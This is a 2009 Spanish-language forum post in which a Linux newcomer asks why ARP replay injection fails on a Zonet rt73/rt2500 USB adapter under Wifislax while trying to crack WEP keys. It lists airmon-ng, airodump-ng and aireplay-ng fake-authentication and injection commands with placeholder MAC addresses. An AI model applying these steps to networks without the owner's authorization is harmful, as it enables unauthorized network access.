Autor Tema: tengo un problema con mi usb  (Leído 1371 veces)

0 Usuarios y 1 Visitante están viendo este tema.

danger23

  • Visitante
tengo un problema con mi usb
« en: 25-03-2009, 23:29 (Miércoles) »
hola primeramente un saludos a esta comunidad soy nuevo en el mundo de linux y compre una usb marca zonet modelo zw2507 en windows me corre con el chip rt73 y con el wifislax 3.1 me corre con el rt2500.

cuando inicio el wifislax necesito darle en donde dice forzar rt73 sobre rt2500 y pongo iwconfig y me sale que el driver que esta usando es el rt2500.

el problema que tengo es que la quiero para decifrar las claves wep pues todo sale bien todo pero no manda nada de paquetes solo los lee y no capta de arp ni tampoco send


esto es lo que hago si hago algo mal les agradeceria mucho que me corrijieran por fa

forzo rt73 sobre rt2500
sale lo sig
iwconfig

interface=rausb0  driver= rt2500 etc.

airmon-ng start rausb0 11

me lo pone en modo monitor

airodump-ng -w aaaa -c11 rausb0


veo a cual red y...

aireplay-ng -1 30 -e XXXX -a MACV -h MACC rausb0

sale lo sig

sending authentication request
sending authentication request
sending authentication request
sending authentication request
sending authentication request 


abro otra ventana


aireplay-ng -3 -x600 -b MACV -h MACC rausb0


eh aqui el problema no hace mas que leer (reed) y no envia nada ha leido hasta 30000 paquetes y nunca ha enviado uno solo


que creen que pueda ser espero alguien me ayude por que la verdad me he quebrado la cabeza y nada mas no puedo hacerlo gracias saludos....





« Última modificación: 25-03-2009, 23:34 (Miércoles) por danger23 »